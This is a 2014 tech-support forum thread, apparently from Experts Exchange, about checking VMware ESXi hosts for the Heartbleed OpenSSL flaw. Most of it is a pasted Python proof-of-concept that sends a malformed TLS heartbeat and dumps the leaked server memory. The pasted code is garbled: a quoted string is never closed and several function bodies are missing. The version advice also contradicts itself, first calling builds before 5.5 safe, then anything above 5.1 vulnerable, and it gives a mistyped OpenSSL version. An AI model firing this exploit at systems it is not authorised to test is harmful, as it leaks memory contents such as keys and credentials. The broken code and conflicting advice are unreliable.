Go Premium for a chance to win a PS4. Enter to Win


A Script to Determine OpenSSL version on ESXi Host

Posted on 2014-04-09
Medium Priority
Last Modified: 2014-04-16
I need to write a script that basically run thru each ESX host and determine what version of OpenSSL is running and report back which, if any, are vulnerable.

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable

Those any such script that is similar already exist?


Question by:lipotech
  • 7
  • 5
LVL 124
ID: 39990321
see this thread, will answer your question, you just need to check VMware ESXi BUILDs

a test script is included...


prior to ESXi 5.5 should be unaffected.

VMware response...


Author Comment

ID: 39998893

Sorry for the delayed response.  I have been involved in other support activities over the weekend.  I followed the thread as you recommended.  I reviewed the script and I have a series of questions:

1.  Is this a PowerCli?
2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.
3. Would the script be saved as a text file and launched from within PowerShell from the command line?

That you for your support.

LVL 124
ID: 39998914
1.  Is this a PowerCli?


It's not PowerCLI.

Are all your hosts 5.5, if they are 5.5, they have the issue.

If they are lower than 5.1, they do not have this issue.

It's that simple, the details in the forum, are a simple openssl.exe connection call.

2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.

It's run from the command prompt, in the Openssl folder, against the IP Address, of a suspect system (vCenter Server or Host)

3. Would the script be saved as a text file and launched from within PowerShell from the command line?

It's not a script, it's just a command line function.

Personally, I would not waste your time, check your Host versions > 5.1 you have the threat, and you will need to wait for the VMware patch.

< 5.1 no threat exists!
Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

LVL 124
ID: 39999136
if you really want a script, here is a python script

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01

hb = h2bin('''
18 03 02 00 03
01 40 00

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    print 'Waiting for Server Hello...'
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:

    print 'Sending heartbeat request...'

if __name__ == '__main__':


Open in new window


Author Comment

ID: 39999225

Thank you.  I or two more final questions.  Is the Pytjon script luanched fromt the ESX host OpenSSl folders as well?  Can I launch the script as is by saving it to a text file?  What extention would I use on the file?  Do I point this file at the IP address as well?

LVL 124
ID: 39999339
You will need to use the Python script on any computer which has Python installed, this is NOT ESXi!

OpenSSL is not required, just Python.

Save the above to a file called <filename.py> execute permissions, and run from Linux or Windows.

you type

./heartbleed.py <IP Address?

it will return:-

WARNING: server returned more data than it should - server is vulnerable!

Author Comment

ID: 40003896

I can install Python and use this script.  I would prefer to run a PowerCLI script in this environment.  If there is PowerCLI script that exist, please let me know.  

Otherwise, thank you for providing a complete response to my question.

LVL 124

Accepted Solution

Andrew Hancock (VMware vExpert / EE MVE^2) earned 2000 total points
ID: 40003942
I've not seen a PowerCLI script at present.

Wait until 19th April 2014, there will be a patch and update released!

You could use PowerCLI to run the following command...

~ # openssl version
OpenSSL 1.0.1e 11 Feb 2013
~ # vmware --version
VMware ESXi 5.5.0 build-1623387

if version = 1.1.0e you have the bug, it's not a test, but only ESXi 5.5 has the issue!

Author Comment

ID: 40004141
Thank you.
LVL 124
ID: 40004160
no problems

Author Comment

ID: 40004193
If you know of any PowerCli scripts of any type that would be easy follow and test, it would be appreciated.  I am in the process of trying to become more proficient with the PowerCLI scripting language.
LVL 124
ID: 40004281
See my response to your recent posting.

Featured Post

Hire Technology Freelancers with Gigs

Work with freelancers specializing in everything from database administration to programming, who have proven themselves as experts in their field. Hire the best, collaborate easily, pay securely, and get projects done right.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

In real business world data are crucial and sometimes data are shared among different information systems. Hence, an agreeable file transfer protocol need to be established.
August and September have been big months for VMware—from VMworld last month to our new Course of the Month in VMware Professional - Data Center Virtualization. We reached out to Andrew Hancock, resident VMware vExpert, to have a more in-depth discu…
This Micro Tutorial steps you through the configuration steps to configure your ESXi host Management Network settings and test the management network, ensure the host is recognized by the DNS Server, configure a new password, and the troubleshooting…
This Micro Tutorial walks you through using a remote console to access a server and install ESXi 5.1. This example is showing remote access and installation using a Dell server. The hypervisor is the very first component of your virtual infrastructu…

926 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question